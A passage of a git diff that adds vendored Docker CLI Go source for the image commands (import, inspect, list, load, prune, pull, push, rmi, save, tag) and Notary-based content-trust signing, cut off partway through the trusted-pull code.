+func NewImportCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts importOptions
+
+	cmd := &cobra.Command{
+		Use:   "import [OPTIONS] file|URL|- [REPOSITORY[:TAG]]",
+		Short: "Import the contents from a tarball to create a filesystem image",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.source = args[0]
+			if len(args) > 1 {
+				opts.reference = args[1]
+			}
+			return runImport(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	opts.changes = dockeropts.NewListOpts(nil)
+	flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image")
+	flags.StringVarP(&opts.message, "message", "m", "", "Set commit message for imported image")
+
+	return cmd
+}
+
+func runImport(dockerCli *command.DockerCli, opts importOptions) error {
+	var (
+		in      io.Reader
+		srcName = opts.source
+	)
+
+	if opts.source == "-" {
+		in = dockerCli.In()
+	} else if !urlutil.IsURL(opts.source) {
+		srcName = "-"
+		file, err := os.Open(opts.source)
+		if err != nil {
+			return err
+		}
+		defer file.Close()
+		in = file
+	}
+
+	source := types.ImageImportSource{
+		Source:     in,
+		SourceName: srcName,
+	}
+
+	options := types.ImageImportOptions{
+		Message: opts.message,
+		Changes: opts.changes.GetAll(),
+	}
+
+	clnt := dockerCli.Client()
+
+	responseBody, err := clnt.ImageImport(context.Background(), source, opts.reference, options)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/inspect.go b/vendor/github.com/docker/docker/cli/command/image/inspect.go
new file mode 100644
index 0000000000..217863c772
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/inspect.go
@@ -0,0 +1,44 @@
+package image
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/spf13/cobra"
+)
+
+type inspectOptions struct {
+	format string
+	refs   []string
+}
+
+// newInspectCommand creates a new cobra.Command for `docker image inspect`
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] IMAGE [IMAGE...]",
+		Short: "Display detailed information on one or more images",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.refs = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	getRefFunc := func(ref string) (interface{}, []byte, error) {
+		return client.ImageInspectWithRaw(ctx, ref)
+	}
+	return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/list.go b/vendor/github.com/docker/docker/cli/command/image/list.go
new file mode 100644
index 0000000000..679604fc02
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/list.go
@@ -0,0 +1,96 @@
+package image
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+type imagesOptions struct {
+	matchName string
+
+	quiet       bool
+	all         bool
+	noTrunc     bool
+	showDigests bool
+	format      string
+	filter      opts.FilterOpt
+}
+
+// NewImagesCommand creates a new `docker images` command
+func NewImagesCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := imagesOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "images [OPTIONS] [REPOSITORY[:TAG]]",
+		Short: "List images",
+		Args:  cli.RequiresMaxArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if len(args) > 0 {
+				opts.matchName = args[0]
+			}
+			return runImages(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only show numeric IDs")
+	flags.BoolVarP(&opts.all, "all", "a", false, "Show all images (default hides intermediate images)")
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
+	flags.BoolVar(&opts.showDigests, "digests", false, "Show digests")
+	flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := *NewImagesCommand(dockerCli)
+	cmd.Aliases = []string{"images", "list"}
+	cmd.Use = "ls [OPTIONS] [REPOSITORY[:TAG]]"
+	return &cmd
+}
+
+func runImages(dockerCli *command.DockerCli, opts imagesOptions) error {
+	ctx := context.Background()
+
+	filters := opts.filter.Value()
+	if opts.matchName != "" {
+		filters.Add("reference", opts.matchName)
+	}
+
+	options := types.ImageListOptions{
+		All:     opts.all,
+		Filters: filters,
+	}
+
+	images, err := dockerCli.Client().ImageList(ctx, options)
+	if err != nil {
+		return err
+	}
+
+	format := opts.format
+	if len(format) == 0 {
+		if len(dockerCli.ConfigFile().ImagesFormat) > 0 && !opts.quiet {
+			format = dockerCli.ConfigFile().ImagesFormat
+		} else {
+			format = formatter.TableFormatKey
+		}
+	}
+
+	imageCtx := formatter.ImageContext{
+		Context: formatter.Context{
+			Output: dockerCli.Out(),
+			Format: formatter.NewImageFormat(format, opts.quiet, opts.showDigests),
+			Trunc:  !opts.noTrunc,
+		},
+		Digest: opts.showDigests,
+	}
+	return formatter.ImageWrite(imageCtx, images)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/load.go b/vendor/github.com/docker/docker/cli/command/image/load.go
new file mode 100644
index 0000000000..988f5106e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/load.go
@@ -0,0 +1,77 @@
+package image
+
+import (
+	"fmt"
+	"io"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/system"
+	"github.com/spf13/cobra"
+)
+
+type loadOptions struct {
+	input string
+	quiet bool
+}
+
+// NewLoadCommand creates a new `docker load` command
+func NewLoadCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts loadOptions
+
+	cmd := &cobra.Command{
+		Use:   "load [OPTIONS]",
+		Short: "Load an image from a tar archive or STDIN",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runLoad(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.input, "input", "i", "", "Read from tar archive file, instead of STDIN")
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Suppress the load output")
+
+	return cmd
+}
+
+func runLoad(dockerCli *command.DockerCli, opts loadOptions) error {
+
+	var input io.Reader = dockerCli.In()
+	if opts.input != "" {
+		// We use system.OpenSequential to use sequential file access on Windows, avoiding
+		// depleting the standby list un-necessarily. On Linux, this equates to a regular os.Open.
+		file, err := system.OpenSequential(opts.input)
+		if err != nil {
+			return err
+		}
+		defer file.Close()
+		input = file
+	}
+
+	// To avoid getting stuck, verify that a tar file is given either in
+	// the input flag or through stdin and if not display an error message and exit.
+	if opts.input == "" && dockerCli.In().IsTerminal() {
+		return fmt.Errorf("requested load from stdin, but stdin is empty")
+	}
+
+	if !dockerCli.Out().IsTerminal() {
+		opts.quiet = true
+	}
+	response, err := dockerCli.Client().ImageLoad(context.Background(), input, opts.quiet)
+	if err != nil {
+		return err
+	}
+	defer response.Body.Close()
+
+	if response.Body != nil && response.JSON {
+		return jsonmessage.DisplayJSONMessagesToStream(response.Body, dockerCli.Out(), nil)
+	}
+
+	_, err = io.Copy(dockerCli.Out(), response.Body)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/prune.go b/vendor/github.com/docker/docker/cli/command/image/prune.go
new file mode 100644
index 0000000000..82c28fcf49
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/prune.go
@@ -0,0 +1,92 @@
+package image
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	units "github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type pruneOptions struct {
+	force bool
+	all   bool
+}
+
+// NewPruneCommand returns a new cobra prune command for images
+func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pruneOptions
+
+	cmd := &cobra.Command{
+		Use:   "prune [OPTIONS]",
+		Short: "Remove unused images",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			spaceReclaimed, output, err := runPrune(dockerCli, opts)
+			if err != nil {
+				return err
+			}
+			if output != "" {
+				fmt.Fprintln(dockerCli.Out(), output)
+			}
+			fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
+			return nil
+		},
+		Tags: map[string]string{"version": "1.25"},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
+	flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images, not just dangling ones")
+
+	return cmd
+}
+
+const (
+	allImageWarning = `WARNING! This will remove all images without at least one container associated to them.
+Are you sure you want to continue?`
+	danglingWarning = `WARNING! This will remove all dangling images.
+Are you sure you want to continue?`
+)
+
+func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) {
+	pruneFilters := filters.NewArgs()
+	pruneFilters.Add("dangling", fmt.Sprintf("%v", !opts.all))
+
+	warning := danglingWarning
+	if opts.all {
+		warning = allImageWarning
+	}
+	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
+		return
+	}
+
+	report, err := dockerCli.Client().ImagesPrune(context.Background(), pruneFilters)
+	if err != nil {
+		return
+	}
+
+	if len(report.ImagesDeleted) > 0 {
+		output = "Deleted Images:\n"
+		for _, st := range report.ImagesDeleted {
+			if st.Untagged != "" {
+				output += fmt.Sprintln("untagged:", st.Untagged)
+			} else {
+				output += fmt.Sprintln("deleted:", st.Deleted)
+			}
+		}
+		spaceReclaimed = report.SpaceReclaimed
+	}
+
+	return
+}
+
+// RunPrune calls the Image Prune API
+// This returns the amount of space reclaimed and a detailed output string
+func RunPrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) {
+	return runPrune(dockerCli, pruneOptions{force: true, all: all})
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/pull.go b/vendor/github.com/docker/docker/cli/command/image/pull.go
new file mode 100644
index 0000000000..24933fe846
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/pull.go
@@ -0,0 +1,84 @@
+package image
+
+import (
+	"errors"
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/cobra"
+)
+
+type pullOptions struct {
+	remote string
+	all    bool
+}
+
+// NewPullCommand creates a new `docker pull` command
+func NewPullCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pullOptions
+
+	cmd := &cobra.Command{
+		Use:   "pull [OPTIONS] NAME[:TAG|@DIGEST]",
+		Short: "Pull an image or a repository from a registry",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.remote = args[0]
+			return runPull(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.all, "all-tags", "a", false, "Download all tagged images in the repository")
+	command.AddTrustedFlags(flags, true)
+
+	return cmd
+}
+
+func runPull(dockerCli *command.DockerCli, opts pullOptions) error {
+	distributionRef, err := reference.ParseNamed(opts.remote)
+	if err != nil {
+		return err
+	}
+	if opts.all && !reference.IsNameOnly(distributionRef) {
+		return errors.New("tag can't be used with --all-tags/-a")
+	}
+
+	if !opts.all && reference.IsNameOnly(distributionRef) {
+		distributionRef = reference.WithDefaultTag(distributionRef)
+		fmt.Fprintf(dockerCli.Out(), "Using default tag: %s\n", reference.DefaultTag)
+	}
+
+	// Resolve the Repository name from fqn to RepositoryInfo
+	repoInfo, err := registry.ParseRepositoryInfo(distributionRef)
+	if err != nil {
+		return err
+	}
+
+	ctx := context.Background()
+
+	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
+	requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "pull")
+
+	// Check if reference has a digest
+	_, isCanonical := distributionRef.(reference.Canonical)
+	if command.IsTrusted() && !isCanonical {
+		err = trustedPull(ctx, dockerCli, repoInfo, distributionRef, authConfig, requestPrivilege)
+	} else {
+		err = imagePullPrivileged(ctx, dockerCli, authConfig, distributionRef.String(), requestPrivilege, opts.all)
+	}
+	if err != nil {
+		if strings.Contains(err.Error(), "target is plugin") {
+			return errors.New(err.Error() + " - Use `docker plugin install`")
+		}
+		return err
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/push.go b/vendor/github.com/docker/docker/cli/command/image/push.go
new file mode 100644
index 0000000000..a8ce4945ec
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/push.go
@@ -0,0 +1,61 @@
+package image
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/spf13/cobra"
+)
+
+// NewPushCommand creates a new `docker push` command
+func NewPushCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "push [OPTIONS] NAME[:TAG]",
+		Short: "Push an image or a repository to a registry",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runPush(dockerCli, args[0])
+		},
+	}
+
+	flags := cmd.Flags()
+
+	command.AddTrustedFlags(flags, true)
+
+	return cmd
+}
+
+func runPush(dockerCli *command.DockerCli, remote string) error {
+	ref, err := reference.ParseNamed(remote)
+	if err != nil {
+		return err
+	}
+
+	// Resolve the Repository name from fqn to RepositoryInfo
+	repoInfo, err := registry.ParseRepositoryInfo(ref)
+	if err != nil {
+		return err
+	}
+
+	ctx := context.Background()
+
+	// Resolve the Auth config relevant for this server
+	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
+	requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, repoInfo.Index, "push")
+
+	if command.IsTrusted() {
+		return trustedPush(ctx, dockerCli, repoInfo, ref, authConfig, requestPrivilege)
+	}
+
+	responseBody, err := imagePushPrivileged(ctx, dockerCli, authConfig, ref.String(), requestPrivilege)
+	if err != nil {
+		return err
+	}
+
+	defer responseBody.Close()
+	return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/remove.go b/vendor/github.com/docker/docker/cli/command/image/remove.go
new file mode 100644
index 0000000000..c79ceba7a8
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/remove.go
@@ -0,0 +1,77 @@
+package image
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type removeOptions struct {
+	force   bool
+	noPrune bool
+}
+
+// NewRemoveCommand creates a new `docker remove` command
+func NewRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts removeOptions
+
+	cmd := &cobra.Command{
+		Use:   "rmi [OPTIONS] IMAGE [IMAGE...]",
+		Short: "Remove one or more images",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runRemove(dockerCli, opts, args)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force removal of the image")
+	flags.BoolVar(&opts.noPrune, "no-prune", false, "Do not delete untagged parents")
+
+	return cmd
+}
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := *NewRemoveCommand(dockerCli)
+	cmd.Aliases = []string{"rmi", "remove"}
+	cmd.Use = "rm [OPTIONS] IMAGE [IMAGE...]"
+	return &cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, opts removeOptions, images []string) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	options := types.ImageRemoveOptions{
+		Force:         opts.force,
+		PruneChildren: !opts.noPrune,
+	}
+
+	var errs []string
+	for _, image := range images {
+		dels, err := client.ImageRemove(ctx, image, options)
+		if err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			for _, del := range dels {
+				if del.Deleted != "" {
+					fmt.Fprintf(dockerCli.Out(), "Deleted: %s\n", del.Deleted)
+				} else {
+					fmt.Fprintf(dockerCli.Out(), "Untagged: %s\n", del.Untagged)
+				}
+			}
+		}
+	}
+
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/save.go b/vendor/github.com/docker/docker/cli/command/image/save.go
new file mode 100644
index 0000000000..bbe82d2a05
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/save.go
@@ -0,0 +1,57 @@
+package image
+
+import (
+	"errors"
+	"io"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type saveOptions struct {
+	images []string
+	output string
+}
+
+// NewSaveCommand creates a new `docker save` command
+func NewSaveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts saveOptions
+
+	cmd := &cobra.Command{
+		Use:   "save [OPTIONS] IMAGE [IMAGE...]",
+		Short: "Save one or more images to a tar archive (streamed to STDOUT by default)",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.images = args
+			return runSave(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT")
+
+	return cmd
+}
+
+func runSave(dockerCli *command.DockerCli, opts saveOptions) error {
+	if opts.output == "" && dockerCli.Out().IsTerminal() {
+		return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.")
+	}
+
+	responseBody, err := dockerCli.Client().ImageSave(context.Background(), opts.images)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	if opts.output == "" {
+		_, err := io.Copy(dockerCli.Out(), responseBody)
+		return err
+	}
+
+	return command.CopyToFile(opts.output, responseBody)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/tag.go b/vendor/github.com/docker/docker/cli/command/image/tag.go
new file mode 100644
index 0000000000..fb2b703856
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/tag.go
@@ -0,0 +1,41 @@
+package image
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type tagOptions struct {
+	image string
+	name  string
+}
+
+// NewTagCommand creates a new `docker tag` command
+func NewTagCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts tagOptions
+
+	cmd := &cobra.Command{
+		Use:   "tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]",
+		Short: "Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE",
+		Args:  cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.image = args[0]
+			opts.name = args[1]
+			return runTag(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.SetInterspersed(false)
+
+	return cmd
+}
+
+func runTag(dockerCli *command.DockerCli, opts tagOptions) error {
+	ctx := context.Background()
+
+	return dockerCli.Client().ImageTag(ctx, opts.image, opts.name)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/image/trust.go b/vendor/github.com/docker/docker/cli/command/image/trust.go
new file mode 100644
index 0000000000..5136a22156
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/image/trust.go
@@ -0,0 +1,381 @@
+package image
+
+import (
+	"encoding/hex"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"path"
+	"sort"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/trust"
+	"github.com/docker/docker/distribution"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/docker/notary/client"
+	"github.com/docker/notary/tuf/data"
+)
+
+type target struct {
+	name   string
+	digest digest.Digest
+	size   int64
+}
+
+// trustedPush handles content trust pushing of an image
+func trustedPush(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error {
+	responseBody, err := imagePushPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege)
+	if err != nil {
+		return err
+	}
+
+	defer responseBody.Close()
+
+	return PushTrustedReference(cli, repoInfo, ref, authConfig, responseBody)
+}
+
+// PushTrustedReference pushes a canonical reference to the trust server.
+func PushTrustedReference(cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, in io.Reader) error {
+	// If it is a trusted push we would like to find the target entry which match the
+	// tag provided in the function and then do an AddTarget later.
+	target := &client.Target{}
+	// Count the times of calling for handleTarget,
+	// if it is called more that once, that should be considered an error in a trusted push.
+	cnt := 0
+	handleTarget := func(aux *json.RawMessage) {
+		cnt++
+		if cnt > 1 {
+			// handleTarget should only be called one. This will be treated as an error.
+			return
+		}
+
+		var pushResult distribution.PushResult
+		err := json.Unmarshal(*aux, &pushResult)
+		if err == nil && pushResult.Tag != "" && pushResult.Digest.Validate() == nil {
+			h, err := hex.DecodeString(pushResult.Digest.Hex())
+			if err != nil {
+				target = nil
+				return
+			}
+			target.Name = pushResult.Tag
+			target.Hashes = data.Hashes{string(pushResult.Digest.Algorithm()): h}
+			target.Length = int64(pushResult.Size)
+		}
+	}
+
+	var tag string
+	switch x := ref.(type) {
+	case reference.Canonical:
+		return errors.New("cannot push a digest reference")
+	case reference.NamedTagged:
+		tag = x.Tag()
+	default:
+		// We want trust signatures to always take an explicit tag,
+		// otherwise it will act as an untrusted push.
+		if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), nil); err != nil {
+			return err
+		}
+		fmt.Fprintln(cli.Out(), "No tag specified, skipping trust metadata push")
+		return nil
+	}
+
+	if err := jsonmessage.DisplayJSONMessagesToStream(in, cli.Out(), handleTarget); err != nil {
+		return err
+	}
+
+	if cnt > 1 {
+		return fmt.Errorf("internal error: only one call to handleTarget expected")
+	}
+
+	if target == nil {
+		fmt.Fprintln(cli.Out(), "No targets found, please provide a specific tag in order to sign it")
+		return nil
+	}
+
+	fmt.Fprintln(cli.Out(), "Signing and pushing trust metadata")
+
+	repo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "push", "pull")
+	if err != nil {
+		fmt.Fprintf(cli.Out(), "Error establishing connection to notary repository: %s\n", err)
+		return err
+	}
+
+	// get the latest repository metadata so we can figure out which roles to sign
+	err = repo.Update(false)
+
+	switch err.(type) {
+	case client.ErrRepoNotInitialized, client.ErrRepositoryNotExist:
+		keys := repo.CryptoService.ListKeys(data.CanonicalRootRole)
+		var rootKeyID string
+		// always select the first root key
+		if len(keys) > 0 {
+			sort.Strings(keys)
+			rootKeyID = keys[0]
+		} else {
+			rootPublicKey, err := repo.CryptoService.Create(data.CanonicalRootRole, "", data.ECDSAKey)
+			if err != nil {
+				return err
+			}
+			rootKeyID = rootPublicKey.ID()
+		}
+
+		// Initialize the notary repository with a remotely managed snapshot key
+		if err := repo.Initialize([]string{rootKeyID}, data.CanonicalSnapshotRole); err != nil {
+			return trust.NotaryError(repoInfo.FullName(), err)
+		}
+		fmt.Fprintf(cli.Out(), "Finished initializing %q\n", repoInfo.FullName())
+		err = repo.AddTarget(target, data.CanonicalTargetsRole)
+	case nil:
+		// already initialized and we have successfully downloaded the latest metadata
+		err = addTargetToAllSignableRoles(repo, target)
+	default:
+		return trust.NotaryError(repoInfo.FullName(), err)
+	}
+
+	if err == nil {
+		err = repo.Publish()
+	}
+
+	if err != nil {
+		fmt.Fprintf(cli.Out(), "Failed to sign %q:%s - %s\n", repoInfo.FullName(), tag, err.Error())
+		return trust.NotaryError(repoInfo.FullName(), err)
+	}
+
+	fmt.Fprintf(cli.Out(), "Successfully signed %q:%s\n", repoInfo.FullName(), tag)
+	return nil
+}
+
+// Attempt to add the image target to all the top level delegation roles we can
+// (based on whether we have the signing key and whether the role's path allows
+// us to).
+// If there are no delegation roles, we add to the targets role.
+func addTargetToAllSignableRoles(repo *client.NotaryRepository, target *client.Target) error {
+	var signableRoles []string
+
+	// translate the full key names, which includes the GUN, into just the key IDs
+	allCanonicalKeyIDs := make(map[string]struct{})
+	for fullKeyID := range repo.CryptoService.ListAllKeys() {
+		allCanonicalKeyIDs[path.Base(fullKeyID)] = struct{}{}
+	}
+
+	allDelegationRoles, err := repo.GetDelegationRoles()
+	if err != nil {
+		return err
+	}
+
+	// if there are no delegation roles, then just try to sign it into the targets role
+	if len(allDelegationRoles) == 0 {
+		return repo.AddTarget(target, data.CanonicalTargetsRole)
+	}
+
+	// there are delegation roles, find every delegation role we have a key for, and
+	// attempt to sign into into all those roles.
+	for _, delegationRole := range allDelegationRoles {
+		// We do not support signing any delegation role that isn't a direct child of the targets role.
+		// Also don't bother checking the keys if we can't add the target
+		// to this role due to path restrictions
+		if path.Dir(delegationRole.Name) != data.CanonicalTargetsRole || !delegationRole.CheckPaths(target.Name) {
+			continue
+		}
+
+		for _, canonicalKeyID := range delegationRole.KeyIDs {
+			if _, ok := allCanonicalKeyIDs[canonicalKeyID]; ok {
+				signableRoles = append(signableRoles, delegationRole.Name)
+				break
+			}
+		}
+	}
+
+	if len(signableRoles) == 0 {
+		return fmt.Errorf("no valid signing keys for delegation roles")
+	}
+
+	return repo.AddTarget(target, signableRoles...)
+}
+
+// imagePushPrivileged push the image
+func imagePushPrivileged(ctx context.Context, cli *command.DockerCli, authConfig types.AuthConfig, ref string, requestPrivilege types.RequestPrivilegeFunc) (io.ReadCloser, error) {
+	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return nil, err
+	}
+	options := types.ImagePushOptions{
+		RegistryAuth:  encodedAuth,
+		PrivilegeFunc: requestPrivilege,
+	}
+
+	return cli.Client().ImagePush(ctx, ref, options)
+}
+
+// trustedPull handles content trust pulling of an image
+func trustedPull(ctx context.Context, cli *command.DockerCli, repoInfo *registry.RepositoryInfo, ref reference.Named, authConfig types.AuthConfig, requestPrivilege types.RequestPrivilegeFunc) error {
+	var refs []target
+
+	notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull")
+	if err != nil {
+		fmt.Fprintf(cli.Out(), "Error establishing connection to trust repository: %s\n", err)
+		return err
+	}
+
+	if tagged, isTagged := ref.(reference.NamedTagged); !isTagged {
+		// List all targets
+		targets, err := notaryRepo.ListTargets(trust.ReleasesRole, data.CanonicalTargetsRole)
+		if err != nil {
+			return trust.NotaryError(repoInfo.FullName(), err)
+		}
+		for _, tgt := range targets {
+			t, err := convertTarget(tgt.Target)
+			if err != nil {
+				fmt.Fprintf(cli.Out(), "Skipping target for %q\n", repoInfo.Name())
+				continue
+			}
+			// Only list tags in the top level targets role or the releases delegation role - ignore
+			// all other delegation roles
+			if tgt.Role != trust.ReleasesRole && tgt.Role != data.CanonicalTargetsRole {
+				continue
+			}
+			refs = append(refs, t)
+		}
+		if len(refs) == 0 {
+			return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trusted tags for %s", repoInfo.FullName()))
+		}
+	} else {
+		t, err := notaryRepo.GetTargetByName(tagged.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole)
+		if err != nil {
+			return trust.NotaryError(repoInfo.FullName(), err)
+		}
+		// Only get the tag if it's in the top level targets role or the releases delegation role
+		// ignore it if it's in any other delegation roles
+		if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole {
+			return trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", tagged.Tag()))
+		}
+
+		logrus.Debugf("retrieving target for %s role\n", t.Role)
+		r, err := convertTarget(t.Target)
+		if err != nil {
+			return err
+
+		}
+		refs = append(refs, r)
+	}
+
+	for i, r := range refs {
+		displayTag := r.name
+		if displayTag != "" {
+			displayTag = ":" + displayTag
+		}
+		fmt.Fprintf(cli.Out(), "Pull (%d of %d): %s%s@%s\n", i+1, len(refs), repoInfo.Name(), displayTag, r.digest)
+
+		ref, err := reference.WithDigest(reference.TrimNamed(repoInfo), r.digest)
+		if err != nil {
+			return err
+		}
+		if err := imagePullPrivileged(ctx, cli, authConfig, ref.String(), requestPrivilege, false); err != nil {
+			return err
+		}
+
